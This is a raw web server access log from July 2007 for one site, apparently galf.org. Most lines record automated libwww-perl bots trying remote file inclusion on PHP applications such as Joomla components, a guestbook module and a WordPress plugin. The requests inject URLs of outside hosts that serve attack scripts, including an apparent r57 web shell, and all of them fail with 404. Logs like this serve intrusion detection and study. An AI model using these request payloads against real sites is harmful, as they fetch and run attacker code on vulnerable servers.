203.19.59.5 - - [15/Jul/2007:20:37:34 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.48.42.218 - - [15/Jul/2007:20:37:42 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.48.42.218 - - [15/Jul/2007:20:37:48 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.48.42.218 - - [15/Jul/2007:20:37:49 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.188.66.118 - - [15/Jul/2007:20:41:33 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.188.66.118 - - [15/Jul/2007:20:41:34 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.169.46.98 - - [15/Jul/2007:20:41:34 -0700] "GET /logs/components/com_galleria/galleria.html.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Bluecoat DRTR)"
193.188.66.118 - - [15/Jul/2007:20:41:35 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.169.46.98 - - [15/Jul/2007:20:41:35 -0700] "GET /components/com_galleria/galleria.html.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Bluecoat DRTR)" "galf.org"
193.188.66.118 - - [15/Jul/2007:20:41:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:42:29 -0700] "GET /logs/index2.php?=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:42:31 -0700] "GET /index2.php?=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:42:57 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:42:58 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:43:37 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:43:37 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:44:06 -0700] "GET /logs/index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:44:06 -0700] "GET /index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:44:12 -0700] "GET /logs/access.log/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:44:12 -0700] "GET /middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:44:13 -0700] "GET /logs/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.188.66.118 - - [15/Jul/2007:20:44:20 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.188.66.118 - - [15/Jul/2007:20:44:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.169.46.98 - - [15/Jul/2007:20:44:20 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Bluecoat DRTR)" "galf.org"
193.188.66.118 - - [15/Jul/2007:20:44:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.169.46.98 - - [15/Jul/2007:20:44:21 -0700] "GET /modules/postguestbook/styles/internal/header.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Bluecoat DRTR)" "galf.org"
217.169.46.98 - - [15/Jul/2007:20:44:21 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Bluecoat DRTR)" "galf.org"
207.44.210.70 - - [15/Jul/2007:20:44:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:44:31 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:44:59 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:44:59 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:45:28 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
203.19.59.5 - - [15/Jul/2007:20:45:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
87.230.26.158 - - [15/Jul/2007:20:46:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.230.26.158 - - [15/Jul/2007:20:46:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.165.8.173 - - [15/Jul/2007:20:46:26 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:46:26 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:46:26 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.165.8.173 - - [15/Jul/2007:20:46:26 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:47:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:47:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:48:17 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
203.19.59.5 - - [15/Jul/2007:20:48:17 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.17.136 - - [15/Jul/2007:20:48:28 -0700] "GET /labia/?S=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
198.65.234.150 - - [15/Jul/2007:20:50:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.jicharterhigh.org/faskalis.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
198.65.234.150 - - [15/Jul/2007:20:50:28 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.jicharterhigh.org/faskalis.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:50:59 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:51:00 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:51:00 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:52:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:52:26 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.188.35.62 - - [15/Jul/2007:20:52:47 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
213.188.35.62 - - [15/Jul/2007:20:52:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
213.188.35.62 - - [15/Jul/2007:20:52:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
67.19.16.50 - - [15/Jul/2007:20:52:54 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.16.50 - - [15/Jul/2007:20:52:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.16.50 - - [15/Jul/2007:20:52:55 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
88.2.128.61 - - [15/Jul/2007:20:53:21 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.2.128.61 - - [15/Jul/2007:20:53:22 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
198.65.234.150 - - [15/Jul/2007:20:54:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.jicharterhigh.org/faskalis.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
198.65.234.150 - - [15/Jul/2007:20:54:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.jicharterhigh.org/faskalis.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
88.2.128.61 - - [15/Jul/2007:20:56:09 -0700] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:56:34 -0700] "GET /logs/index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:20:56:36 -0700] "GET /index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
71.29.236.111 - - [15/Jul/2007:20:57:24 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
71.29.236.111 - - [15/Jul/2007:20:57:24 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.2.128.61 - - [15/Jul/2007:20:58:14 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.2.128.61 - - [15/Jul/2007:20:58:15 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:58:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:58:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:58:41 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:58:41 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.54.188.106 - - [15/Jul/2007:21:05:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.54.188.106 - - [15/Jul/2007:21:05:39 -0700] "GET / HTTP/1.0" 200 1032 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:21:05:56 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:21:05:56 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:21:05:56 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.46.98 - - [15/Jul/2007:21:06:12 -0700] "GET /logs/%22Poweredhttp://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.46.98 - - [15/Jul/2007:21:06:12 -0700] "GET /%22Poweredhttp://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:21:06:31 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:21:07:20 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.152.129.53 - - [15/Jul/2007:21:08:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:21:09:09 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:21:09:46 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:21:09:48 -0700] "GET /logs/index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:21:09:56 -0700] "GET /index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.152.140.111 - - [15/Jul/2007:21:10:56 -0700] "GET / HTTP/1.1" 200 1048 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:11:42 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:11:42 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:11:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:11:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.128.13.197 - - [15/Jul/2007:21:12:49 -0700] "GET /logs/access_070702.log HTTP/1.1" 200 327680 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" "www.galf.org"
84.244.166.76 - - [15/Jul/2007:21:16:01 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.19.16.50 - - [15/Jul/2007:21:16:24 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.16.50 - - [15/Jul/2007:21:16:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
84.244.166.76 - - [15/Jul/2007:21:16:26 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
198.65.234.150 - - [15/Jul/2007:21:19:04 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.jicharterhigh.org/faskalis.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:20:07 -0700] "GET /components/com_articles.php?absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.16.50 - - [15/Jul/2007:21:20:55 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.16.50 - - [15/Jul/2007:21:20:55 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.16.50 - - [15/Jul/2007:21:20:55 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:23:18 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:23:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:23:24 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:23:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:24:06 -0700] "GET /logs/access.log/components/com_articles.php?absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:24:06 -0700] "GET /logs/components/com_articles.php?absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.90.118.254 - - [15/Jul/2007:21:24:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.90.118.254 - - [15/Jul/2007:21:24:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:25:40 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:25:42 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:25:44 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:25:52 -0700] "GET /logs/access.log/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:25:54 -0700] "GET /middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:21:25:55 -0700] "GET /logs/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:21:32:06 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:21:34:41 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
71.29.236.111 - - [15/Jul/2007:21:38:29 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
71.29.236.111 - - [15/Jul/2007:21:38:29 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:41:25 -0700] "GET /components/com_articles.php?absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.17.231 - - [15/Jul/2007:21:42:36 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:43:58 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:43:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:45:00 -0700] "GET /logs/access.log/components/com_articles.php?absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:45:00 -0700] "GET /logs/components/com_articles.php?absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.214.56.62 - - [15/Jul/2007:21:45:53 -0700] "GET /logs/fusionbb.php HTTP/1.1" 404 275 "http://www.google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
